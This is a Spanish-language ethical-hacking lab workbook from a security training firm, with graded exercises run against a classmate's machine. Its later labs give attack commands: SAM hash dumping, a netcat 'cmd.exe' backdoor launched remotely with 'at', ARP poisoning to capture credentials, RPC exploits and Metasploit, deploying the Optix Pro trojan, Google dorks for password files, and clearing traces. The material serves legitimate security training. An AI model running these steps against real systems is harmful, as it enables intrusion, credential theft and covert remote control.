Está en la página 1de 20

Laboratorios

Level 1

Isec Information Security Inc.


PROFESIONALES EN SEGURIDAD DE LA INFORMACIÓN

Ethical Hacking
ETHICAL
Técnicas HACKING
y Metodologías
de MÉTODOS
Hacking.AVANZADOS DE HACKING Y PROTECCIÓN

Test de Intrusión. COPYRIGHT 2003/2008 ISEC Information Security Inc.


INFORMACIÓN PREVIA AL USUARIO
RECONOCIMIENTO PREVIO DERECHOS DE AUTOR
El contenido de los presentes manuales técnicos (o sistema de instrucción o curso según
corresponda) denominados “Ethical Hacking” ha sido creado y desarrollado por I-SEC
INFORMATION SECURITY y se encuentra debidamente protegido por las leyes de Propiedad
Intelectual vigentes, incluyendo imágenes, diseños de arte, textos, programa de computación y
marca registrada. Queda expresamente prohibida su copia o reproducción total o parcial no
autorizada, como así también, la utilización fraudulenta de la idea y concepto plasmado en su
contenido.

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 1 1. Objetivo: Familiarizarse con el sistema Operativo y ejecutar los comandos
básicos necesarios para los testeos.

Herramienta: cmd.exe
Analizar e interpretar las salidas de los siguientes comandos.
> ipconfig
> ipconfig /all
> ipconfig /renew
> ipconfig /flushdns
> ipconfig /registerdns
> ipconfig /displaydns

> ping –t a la ip del compañero


> ping –t –l 65000 a la ip del compañero

> arp –a
> arp -s 157.55.85.212 00-aa-00-62-c6-09, luego > arp –a
> arp –d *, luego >arp –a

> net accounts


> netstat –an
> net use \\ipdelcompañero\ipc$ “” /user:””
> netstat –r
> net view \\ipdelcompañero
> netstat –v
> net use \\ipdelcompañero\ipc$ /delete
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 1 2. Objetivo: Recolectar información de los sistemas objetivos, reconocer la
cantidad de saltos hasta el objetivo

Herramientas: Super Scan, OSFP , Sam Spade, Nmap, Trabajo de Campo:


Mptraceroute, Reconocimiento Superficial
Enumeración y Reconocimiento en Profundidad
1.Cantidad de saltos hasta el objetivo: Ejecutar Definición de las Herramientas a Utilizar
mptraceroute Ataque Puro
Redefinición de pruebas y herramientas a
• Sobre ip locales utilizar en base a resultados obtenidos
Borrado de rastro y evidencias
• Sobre ip remotas Consolidación
Reporting: Documentación formal y desarrollo
• Usar distintos protocolos en ip con fw de Informes Finales (Técnico y Ejecutivo)

2.Reconocimiento del Sistema Operativo: Ejecutar


Nmap (Copiarlo a la Raíz del Disco) Resultados Esperados:
• Nmap –O ipdelcompañero Respuesta del host, rangos
ip válidos, sistema
3.Reconocimiento del Sistema Operativo: Ejecutar operativo, cantidad de saltos
OSFP hasta el objetivo.
• Correrlo contra la IP del compañero,
analizar e interpretar la salida
4.Reconocimiento: Instalar Samspade
• Analizar las opciones del programa (documentar las
salidas a un txt).

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 1 3. Sniffer, Objetivo: Utilizar un sniffer e interpretar el tráfico de red.

Herramientas:
Wireshark,
Winpcap
Plastic sniffer http://www.plasticwater.com/
Networkactiv http://www.networkactiv.com/
Tareas
1. Instalar winpcap y reiniciar el equipo.
2. Instalar los Sniffers
3. Correr los Sniffers e interpretar el tráfico, (identificar
rangos de ip validos, protocolos, mac adress, etc).

(documentar
las salidas a
un txt).

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 1 4. Google Hacking. Objetivo: Analizar ejemplos de ingeniería social, archivos
confidenciales , archivos de configuración, información de reconocimiento

Herramientas: www.google.com • Buscar dispositivos


•Reconocimiento, identificar sistema operativo y específicos:
servicio web. Ej intitle:“powered by Apache” inurl:indexFrame.shtml Axis
•Paraíso del spammer, buscar *.pst, ¨fw:¨, etc. intext:centreware inurl:status
•Listar directorios:
• Buscar cuentas de correo
intitle:index.of “Back Up” electrónico:
intitle:index.of.admin @dominio.com
intitle:index.of ws_ftp.log (encontrar 10 cuentas del dominio)
•Buscar Archivos específicos:
inurl:cuentas filetype:xls
filetype:bak inurl:"passwd“
"access denied for user" "using password“
filetype:pst inurl:pst
•Ingeniería Social, buscar información útil para el (documentar las
atacante de un objetivo específico. (ej: busco salidas a un txt).
información @algundominio.com)

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Laboratorios
Level 2

Isec Information Security Inc.


PROFESIONALES EN SEGURIDAD DE LA INFORMACIÓN

Ethical Hacking
ETHICAL
Técnicas HACKING
y Metodologías
de MÉTODOS
Hacking.AVANZADOS DE HACKING Y PROTECCIÓN

Test de Intrusión. COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 2 5 – DNS Stuff, Objetivo: Obtener información de reconocimiento a través de
investigación del servidor DNS del objetivo.
Herramienta: Sam Spade, DNS Query, línea de comandos e internet.
•Sam Spade: Obtener ip de los servidores DNS primario y secundario del objetivo.
Nslookup objetivo
Who is objetivo
•Internet: Buscar la misma información en www.nic.ar (o el país que corresponda)
•Internet: buscar errores de configuración de los servidores DNS, www.dnsstuff.org

•Línea de Comandos: Buscar información de


dispositivos, sistemas operativos, servidores. Ej:
>nslookup
Default Server: nxx2.pepenitel.net
Address: xxx.145.xxx.98

> server xxx.xxx.xxx.xxx (ip del dns del objetivo)


> set type=any
> ls -d objetivo

•Dns Query: realizar las mismas queries del punto


anterior (documentar las salidas a un txt).
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 2 6. Sniffer Avanzado: análisis de tráfico de red con criterios de seguridad
Herramientas: Wireshark, HttpSpy, SMAC
Wireshark http://www.wireshark.org
HttpSpy http://www.rwtemple.com/software/HttpSpy
Smac http://www.klcconsulting.net/smac/default.htm?v=SMAC11
Tareas:
• Correr el Sniffer Wireshark abrir archivo de jemplo e interpretar el tráfico,
realizar filtros para obtener:
– Puertos y servicios utilizados.
– Listados de páginas navegadas.
– Archivos bajados por emule.
– Usuarios utilizando Mesenger.
• Con el Sniffer activado, navegar en algún webmail ingresando usuario y
contraseña y tratar de reconocerlo en la captura del sniffer.
• Buscar passwords en texto plano (Telnet, Ftp, Smtp, etc)
• Realizar ataque de Spoofing (Modificar IP por una no válida y conectarse) Smac.
• Utilizar HttpSpy y registrar navegación.

(documentar las salidas a un txt).

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 2 7. Port Scanning, Banner Grabbing, Objetivo: Escanear puertos e interpretar
las salidas para obtener servicios puestos en escucha

Port Scanning (nmap) Banner Grabbing (amap)


Realizar un scan de puertos a la ip del Obtener los banners de respuesta de
compañero e interpretar su salida los puertos obtenidos como resultado
Ejecutar Nmap desde la linea de comandos: del escaneo de puertos

Nmap –sT ipdelcompañero


Nmap –sS ipdelcompañero Amap direcciónIP puertos
Nmap –sU ipdelcompañero
Nmap –sP ipdelcompañero
Nmap –sF ipdelcompañero
Nmap –sX ipdelcompañero
Nmap –sV ipdelcompañero
Nmap –sN ipdelcompañero
Nmap –sT –O –P0 ipdelcompañero

(documentar las salidas a un txt).

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 2 8. Vulnerability Scanning, Objetivo: Realizar un escaneo de la LAN en
busca de vulnerabilidades en los host de la RED

Herramienta: Languard 6.0 Herramientas: MegaPing

•Instalar la herramienta •Ejecutar el scanner de NEtBios y shares


•Correr el scanner de vulnerabilidades contra contra la Ip del compañero y agregar al
la Ip del compañero y generar reporte. reporte.
•Realizar distintas configuraciones y ejecutar •Correr el scanner de seguridad contra la Ip
las siguientes consultas: TraceRoute, SNMP del compañero y generar reporte.
Walk, Audit tools, Cracking (Analizar, •Correr el scanner de puertos y agregar al
interpretar su salidas y agregar al reporte) reporte.
•Buscar Un Web Site configurar y buscar:
Reconocimiento (SO, Servicios, traceroute),
Nslookup, SNMP Walk, Vulnerabilidades
(documentar las salidas a un txt).

Nota:
•Languard utiliza tres diferentes querys para reconocimiento de OS: NETBIOS (SMB),
SNMP Comunity o ICMP y analiza los banners.
•Vulnerabilidad: posibilidad de ocurrencia de la materialización de una amenaza sobre un
Activo.
•Amenaza: evento que pueden desencadenar un incidente en la organización, produciendo
daños materiales o pérdidas inmateriales en sus activos.) (Wikipedia)
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 2 9. Vulnerability Scanning, Aplicaciones Web, Objetivo: Realizar un escaneo
de vulnerabilidades comunes a los servidores web
Herramientas: WIKTO, Paros Proxy
Wikto:
Instalar la aplicación
Scanear Web en busca de
Vulnerabilidades
Analizar las salidas y buscar falsos
positivos para descartar del
informe
Paros:
Instalar la aplicación
Crawling de objetivo
Chequear resultados
Analizar e interpretar su salida y
buscar falsos positivos para
descartar del informe
(documentar las salidas a un txt).

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Laboratorios
Level 3

Isec Information Security Inc.


PROFESIONALES EN SEGURIDAD DE LA INFORMACIÓN

Ethical Hacking
ETHICAL
Técnicas HACKING
y Metodologías
de MÉTODOS
Hacking.AVANZADOS DE HACKING Y PROTECCIÓN

Test de Intrusión. COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 3 10. Cracking Windows, Objetivo: Por distintos métodos obtener usuarios y
contraseñas en un ambiente Windows
Herramientas: 1) Crear Usuarios:
Pwdump2 (http://swamp.foofus.net/fizzgig/pwdump/downloads.htm) Usr: mariasol Pass: mariasol
Dumpacl (http://www.bindview.com/Resources/RAZOR/Files/acltools-1.0.zip)
Usr: test1 Pass: pekdor
Lsadump2 (http://www.bindview.com/Resources/RAZOR/Files/lsadump2.zip)
Usr: test2 Pass: 1234567
Pstoreview, SAMDUMP, SamInside, L0phtCrack, Cain.
Usr: xrt345! Pass: xrt345!
2) A través de la Copia de Seguridad: Usr: robusto Pass: !des13
Copiar el archivo sam de %raiz%\repair\
(Expandirlo) >expand sam._ cracksam (en algunos casos el archivo no es 4) Contraseñas de Caché:
necesario) >lsadump2
Obtener usuarios y hashes con SAMDUMP y copiarlos a un archivo para crackear >pstoreview
>SAMDUMP cracksam Obtener credenciales de Txtx
plano, sql, web, ftp, usrlocal, ras,
3) Directamente de la SAM: etc
>pwdump6 /localhost Utiliza debilidades del servicio
LSA Local Security Autority
>pwdump6 /192.168.1.123 (si tiene recursos compartidos)
>pwdump6 /l /o:claves.txt
Obtener usuarios y hashes, y copiarlos a un archivo para crackear
En algunas versiones (SP2 XP) agrega una opción mas de protección (Syskey) (guardar los
hashes en txt
5) Otras Opciones para importar SAM y Crackear: para crackear).
SamInside, L0phtCrack, Cain.
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 3 11. Hacking Windows backdoor, Objetivo: Tomar control de forma remota de
un host en ambientes Windows
Herramientas: NetCat (http://www.vulnwatch.org/netcat/nc111nt.zip)

1) Copiar programa servidor en máquina víctima:


Copiar el archivo nc.exe en %raiz%\system32\ usando el recurso compartido descubierto en los prácticos anteriores
2) Ejecutar el servidor de forma remota:
>sc \\192.168.253.212 start schedule (inicia el servicio schedule en laq ip víctima)
>net time \\192.168.253.212 (verifica hora de la víctima)
>at \\192.168.253.212 10:20p “ “ nc –L –d –e cmd.exe –p 8080 “ “
10:20p hora en que se lanzara el backdoor
opción –L: multiproceso
opción –d: modo silencio
opción –e: ejecutar
opción –p: puerto puesto en escucha

>at \\192.168.253.212 (verifica el trabajo en espera)


3) Ejecutar el cliente luego de lanzado el backdoor:
>nc 192.168.253.212 8080
4) Ejecutar el cliente luego de lanzado el backdoor:
Probar otros puertos y otras opciones que saltarían filtros de Fw
Ej1: puerto 53
Ej2: nc -l -p 23 -t -e cmd.exe (opción –t descarta conecciones telnet)
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 3 12. Hacking Inadvertido, Objetivo: realizar distintos ataques para quedar en
medio de una comunicación entre hosts y de esa forma capturar distintos tipos de
credenciales
Herramientas: Caín y línea de comandos
Formar grupos de dos uno será el atacante y otro la víctima, la víctima se loguea y desloguea, hace
telnet, ftp, autentica por web, outlook, etc. El atacante hace arp poison entre la ip víctima y el gateway
Siga los siguientes pasos:
1) Reconocimiento Activo: 4) Cracking:
>ip config (reconocer gateway) Exportar el hash capturado al cracker y realizar
Con Caín hacer reconocimiento activos de host de el cracking de la contraseña
la red.
Identificar un objetivo y buscar saltos hasta él 5) Consolidación:
(traceroute) Loogearse a la máquina remota con el user y
pass obtenidos.
2) Arp Poison:
Seleccionar Ip víctima y realizar un
envenenamiento de arp entre el Gateway y la
víctima.
Analizar la diferencia sin arp poison
3) Sniffing:
Analizar todas las opciones de la herramienta
Sniffear la red en busca del hash de las (MySQLv3.23)
credenciales de un usuario 022D4DE35C395FF8
(MD5)
A94652AA97C7211BA8954DD15A3CF8
COPYRIGHT 2003/2008 ISEC Information Security Inc.
Level 3 13. Exploits, Objetivo: Explotar vulnerabilidades especificas de sistemas
operativos y aplicaciones
Herramientas: Retina RPCDCOM2 , RPCDCOM GUI Exploit, MetaExploit

Vulnerabilidad del servicio RPC (reomte procedure call)


1) Scanear la red en busca de Hosts Vulnerables Retina RPCDCOM
2) Identificar versión de sistema operativo (utilizando técnicas de laboratorios anteriores)
3) Ejecutar el exploit RPCDCOM GUI Exploit y Ganar Consola en host víctima
4) Instalar Metaexploit, correr proxy de Metaexploit y seleccionar exploit correspondiente
5) Ganar consola en objetivo, crear un usuario y sembrar un trofeo

Exploit : (del inglés to exploit, explotar, aprovechar) es el nombre con el que se identifica un
programa informático malicioso, o parte del programa, que trata de forzar alguna deficiencia
o vulnerabilidad de otro programa. El fin puede ser la destrucción o inhabilitación del
sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder
acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de
otros ataques a terceros. (Wikipedia)

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Level 3 14. Troyano, Objetivo: Configuración y ejecucion de troyano, instalación y
toma de control de sistema remoto
Herramientas: Optix Pro, Ingenio 2) Envío del archivo a la víctima:
Enviar el archivo a el recurso compartido
1) Generación del código malicioso: de la víctima (obtenido en trabajos
Descomprimir en una carpeta el troyano (UPX.exe, anteriores)
Builder.exe y Client.exe).
Acceder a la carpeta builder y ejecutar el archivo Ejecutarlo con el comando at como en el
builder.exe laboratorio 11 en la ip víctima
Armar y configurar el servidor del troyano (ver todas las
configuraciones necesarias)

3) Consolidación:
Ejecutar el archivo Client.exe
Tomar el control de la maquina del
compañero
Probar todas las funciones del troyano, No
deben realizarse ataques destructivos.
Desinstalar el servidor troyano de las
máquinas (buscar el servicio que lo ejecuta
y el archivo que ejecuta el servicio)

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Laboratorio Final
Objetivos: Utilización de Metodología definida durante el
curso y realizar un intento de intrusión controlado
cumpliendo con las siguientes etapas:

1.Reconocimiento
2.Enumeración
3.Ataque (Plantar Trofeo o Sacar Trofeo)
4.Borrado de Rastro
5.Consolidación
6.Recomendaciones de mejoras

Generar un informe con los resultados obtenidos y con las


recomendaciones de mejoras

COPYRIGHT 2003/2008 ISEC Information Security Inc.


Hemos llegado, info@isec-global.com
GRACIAS!!!!!!! www.isec-global.com

Instructor:
Christian Vila / ISEC +
Senior Security Consultant
I-SEC Information Security Inc.
Patagonia Argentina
Email: christian.vila@isec-global.com
Office: +54 11 5219-ISEC (4732)

Isec Information Security Inc.


PROFESIONALES EN SEGURIDAD DE LA INFORMACIÓN

Ethical Hacking
ETHICAL
Técnicas HACKING
y Metodologías
de MÉTODOS
Hacking.AVANZADOS DE HACKING Y PROTECCIÓN

Test de Intrusión. COPYRIGHT 2003/2008 ISEC Information Security Inc.

También podría gustarte